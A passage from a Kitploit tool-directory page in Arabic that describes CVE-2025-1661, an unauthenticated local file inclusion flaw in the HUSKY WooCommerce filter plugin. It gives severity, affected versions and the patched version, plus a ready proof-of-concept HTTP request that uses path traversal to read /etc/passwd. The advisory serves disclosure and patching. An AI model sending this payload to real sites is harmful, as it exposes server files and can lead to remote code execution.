Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1661 — HUSKY – Products Filter Professional for WooCommerce هي إضافة لنظام ووردبريس معرضة لثغرة تضمين الملفات المحلية (LFI) | Kitploit
أدوات/GitHubGitHub/shahwarshah/cve-2025-1661
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubshahwarshah/cve-2025-1661

CVE-2025-1661

HUSKY – Products Filter Professional for WooCommerce هي إضافة لنظام ووردبريس معرضة لثغرة تضمين الملفات المحلية (LFI)

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-1661 - تضمين الملفات المحلي غير المصادق عليه (LFI) في HUSKY – Products Filter Professional for WooCommerce

الوصف

إضافة HUSKY – Products Filter Professional for WooCommerce في ووردبريس معرضة لثغرة تضمين الملفات المحلي (LFI) في جميع الإصدارات حتى 1.3.6.5 من خلال معامل template في إجراء AJAX باسم woof_text_search.

يتيح ذلك للمهاجمين غير المصادق عليهم تضمين وتنفيذ ملفات عشوائية على الخادم، الأمر الذي قد يؤدي إلى:

  • تجاوز ضوابط الوصول
  • استخراج بيانات حساسة
  • تنفيذ كود عن بُعد (RCE) إذا تحققت شروط معينة (مثل رفع أنواع ملفات "آمنة")

الخطورة: حرجة

  • درجة CVSS: 9.8 (حرجة)
  • معرّف CWE: CWE-22 (اجتياز المسار)
  • درجة EPS: 0.00061

الإصدارات المتأثرة

  • الإصدارات المعرضة: <= 1.3.6.5
  • الإصدار المُصحَّح: 1.3.6.6

الإصلاح

قم بالتحديث إلى الإصدار 1.3.6.6 أو أي إصدار أحدث يحتوي على التصحيح.


إثبات المفهوم (PoC)

خطوات إعادة الإنتاج

  1. قم بزيارة الموقع المستهدف.
  2. التقط الطلب باستخدام Burp Suite.
  3. غيّر طريقة الطلب إلى POST وأضف الحمولة التالية:
root@kitploit:~
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

action=woof_text_search&

IntercomVulnChecker Screenshot 4. إذا نجح الاستغلال، سيعيد الخادم محتويات ملف /etc/passwd. 5. يمكن استخدام ذلك لاستخراج ملفات حساسة أخرى من الخادم.


المراجع

  • استشارة Wordfence
  • كود إضافة ووردبريس
  • تقرير CVE

إخلاء المسؤولية

إثبات المفهوم (PoC) هذا مخصص لأغراض تعليمية وبحثية فقط. إن الاختبار غير المصرح به للأنظمة دون إذن يعد أمرًا غير قانوني وغير أخلاقي. احرص دائمًا على الحصول على تفويض صريح قبل إجراء أي اختبار أمني.


تنزيل الأداة